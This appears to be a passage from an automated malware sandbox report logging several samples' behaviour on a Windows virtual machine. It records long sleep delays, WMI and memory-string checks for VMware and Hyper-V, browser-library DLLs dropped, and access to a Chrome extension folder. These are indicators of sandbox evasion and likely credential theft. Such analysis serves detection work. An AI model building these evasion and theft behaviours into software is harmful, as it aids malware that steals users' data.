Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 415	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1036	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 636	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 605	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 438	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 680	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Window / User API: threadDelayed 2899	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Window / User API: threadDelayed 5347
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Window / User API: threadDelayed 3667
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 9983

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-109205

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ED0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6V76P.tmp\6ED0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file

Source: C:\Windows\explorer.exe TID: 6188	Thread sleep time: -103600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6176	Thread sleep time: -63600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6188	Thread sleep time: -43800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe TID: 4456	Thread sleep count: 2899 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe TID: 4456	Thread sleep time: -289900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe TID: 5344	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23F8.exe TID: 2072	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\23F8.exe TID: 2072	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -31818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -59828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -30248s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -59698s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -58281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -52476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -59572s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -54807s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 6976	Thread sleep time: -59422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -46092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -47654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -34074s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -34507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -36602s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -43314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -47655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -54970s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -59219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -48830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37152s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -33372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -55368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -47656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -45914s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -50043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -57176s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -55349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -48204s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -30083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -31757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -52638s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -52186s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -30981s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -51293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -49351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -56363s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -49580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -54748s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37668s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -32575s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -32656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -55038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -45441s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -47732s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -38170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -57065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -38729s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37775s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -36008s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -30971s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -48389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -51179s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -46528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -45143s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -35198s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -54370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -48193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -53624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -56497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -58010s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -59361s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -41573s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -43854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37315s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -41922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -43891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -37770s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -43391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -39343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -52594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -51440s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -40985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -57108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -38692s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -58703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -56862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -32212s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -56235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -43418s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -55725s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -34018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -34019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\28CC.exe TID: 3924	Thread sleep time: -48826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe TID: 5260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 3624	Thread sleep count: 9983 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 3624	Thread sleep time: -998300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6632	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3184	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Code function: 7_2_004C0120 memset,GetSystemInfo,

7_2_004C0120

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 31818
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59828
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 30248
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59698
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 58281
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 52476
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59572
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 54807
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59422
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 46092
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 47654
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 34074
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 34507
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 36602
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 43314
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 47655
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 54970
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59219
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 48830
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37152
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 33372
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 55368
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 47656
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 45914
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 50043
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 57176
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37047
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 55349
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 48204
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 30083
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 31757
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 52638
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 52186
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 30981
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 51293
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 49351
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 56363
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 49580
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 54748
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37668
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 32575
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 32656
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 55038
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 45441
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 47732
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 38170
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 57065
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 38729
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37775
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 36008
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 30971
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 48389
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 51179
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 46528
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 45143
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 35198
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 54370
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 48193
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 53624
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 56497
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 58010
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 59361
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 41573
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 43854
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37315
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 41922
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 43891
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 37770
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 43391
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 39343
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 52594
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 51440
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 40985
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 57108
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 38692
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 58703
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 56862
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 32212
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 56235
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 43418
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 55725
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 34018
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 34019
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Thread delayed: delay time: 48826
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: explorer.exe, 00000002.00000000.2030558145.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000002.00000000.2031996552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000000.2029828719.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000002.00000000.2029099333.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
